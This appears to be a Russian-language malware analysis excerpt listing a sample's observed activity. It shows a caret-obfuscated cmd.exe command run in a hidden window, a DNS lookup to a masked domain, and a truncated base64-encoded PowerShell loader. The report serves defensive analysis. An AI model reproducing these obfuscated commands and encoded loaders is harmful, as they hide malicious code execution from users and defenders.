Техническая информация
- '<SYSTEM32>\cmd.exe' wpzjjCOUb uhjjZLtQsPGLUPijcDJIpczmOv zHROIai & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c set %YWslRPjzKMmVHQB%=lRSjFFjzLQ&&set %wApFdGrXzrR%=p&&set %EwXDtjraE%=o^w...
- DNS ASK fq###d8qwd4.com
- '<SYSTEM32>\cmd.exe' wpzjjCOUb uhjjZLtQsPGLUPijcDJIpczmOv zHROIai & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c set %YWslRPjzKMmVHQB%=lRSjFFjzLQ&&set %wApFdGrXzrR%=p&&set %EwXDtjraE%=o^w...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e IAAoAE4AZQB3AC0ATwBCAEoAZQBDAHQAIAAgAFMAeQBTAHQARQBNAC4AaQBvAC4AcwB0AHIARQBhAE0AcgBlAEEARABFAFIAKAAgACgAIABOAGUAdwAtAE8AQgBKAGUAQwB0ACAAcwB5AFMAdABlAG0ALgBpAE8ALgBDAE8AbQBwAHIAZQBzAHMASQBvAG...